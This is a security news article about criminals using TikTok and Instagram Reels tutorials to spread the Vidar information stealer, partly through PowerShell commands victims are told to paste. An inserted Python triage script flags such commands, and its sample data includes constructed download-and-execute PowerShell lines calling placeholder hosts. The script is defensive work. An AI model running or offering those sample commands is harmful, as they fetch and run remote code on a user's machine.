Cybercriminals are increasingly leveraging short-form video platforms like TikTok and Instagram Reels to disseminate malware through deceptive software tutorials. These videos, often polished and convincing, promise free access to premium software but instead lead users to download malicious programs.
According to CyberSecurityNews, attackers create videos that blend seamlessly with legitimate content, making them difficult to distinguish. These clips, sometimes amassing thousands of views and likes, exploit the trust users place in popular social media platforms.
ReversingLabs researchers identified two primary methods employed in these campaigns. Both direct users to third-party websites hosting malware disguised as free premium applications. The malware in question, Vidarstealer, is an information-stealing tool that extracts login credentials, financial data, and session tokens from infected devices. Notably, Vidarstealer received an update in October of the previous year, enhancing its evasion capabilities.
In the first campaign, attackers use accounts with usernames like “windows.tips” or “windows.insights,” featuring profile images resembling official Windows icons. These accounts post professional tutorial videos with AI-generated voiceovers, instructing users to execute specific PowerShell commands to unlock software like Spotify Premium. Following these instructions leads to the silent download and execution of Vidarstealer.
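Because this lure depends on the victim pasting a download-and-execute command into PowerShell, the practical defensive check is to flag such command lines in process-creation telemetry. The following Python triage is an added example, not code from the article or from ReversingLabs; the indicator patterns, the `example.invalid` URLs and the sample command lines are constructed assumptions.

```python
import re

# Indicators typical of "paste this into PowerShell" lures: a download cradle,
# in-memory execution, and flags that hide the console or bypass the execution
# policy. The list is illustrative (assumed), not exhaustive.
INDICATORS = {
    "download_cradle": re.compile(
        r"(Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b|DownloadString|DownloadFile|"
        r"Invoke-RestMethod|\birm\b|Net\.WebClient|Start-BitsTransfer)", re.I),
    "inline_execution": re.compile(r"(Invoke-Expression|\biex\b)", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-(ep|executionpolicy)\s+bypass", re.I),
    "encoded_command": re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote_url": re.compile(r"https?://[^\s'\"]+", re.I),
}

def indicators_for(cmdline):
    """Return the names of all indicators that match one command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]

def is_suspicious(cmdline):
    """Download plus inline execution in one command line is the core of the lure;
    hidden-window and policy-bypass flags only raise confidence, so they are
    reported by indicators_for() but not required here."""
    hits = indicators_for(cmdline)
    fetches = "download_cradle" in hits or "remote_url" in hits
    return fetches and "inline_execution" in hits

# Constructed sample process-creation command lines (not taken from the campaign).
SAMPLE_COMMANDS = [
    'powershell.exe -w hidden -ep bypass -c "iex (iwr https://example.invalid/unlock.ps1 -UseBasicParsing)"',
    'powershell.exe -Command "Get-ChildItem C:\\Users\\alice\\Documents"',
    "powershell.exe -c \"(New-Object Net.WebClient).DownloadString('http://example.invalid/p') | iex\"",
    'powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1',
]

def triage(commands):
    """Return (command, matched indicators) for every suspicious command line."""
    return [(c, indicators_for(c)) for c in commands if is_suspicious(c)]

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_COMMANDS):
        print(f"SUSPICIOUS [{', '.join(hits)}]: {cmd}")
```

Legitimate administration (the backup script with an execution-policy bypass) is deliberately not flagged, since only the combination of fetching remote content and executing it inline reproduces the behaviour the tutorials ask for.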
The second campaign adopts a more casual approach. Accounts post short clips showcasing premium Spotify features accompanied by trending music, encouraging viewers to visit external links for free access. These links direct users to malicious websites that deliver the malware.
These campaigns highlight the evolving tactics of cybercriminals, who now exploit the widespread reach and trust associated with social media platforms to distribute malware. Users should exercise caution when encountering offers for free software and avoid executing commands or downloading applications from unverified sources.
Source: CyberSecurityNews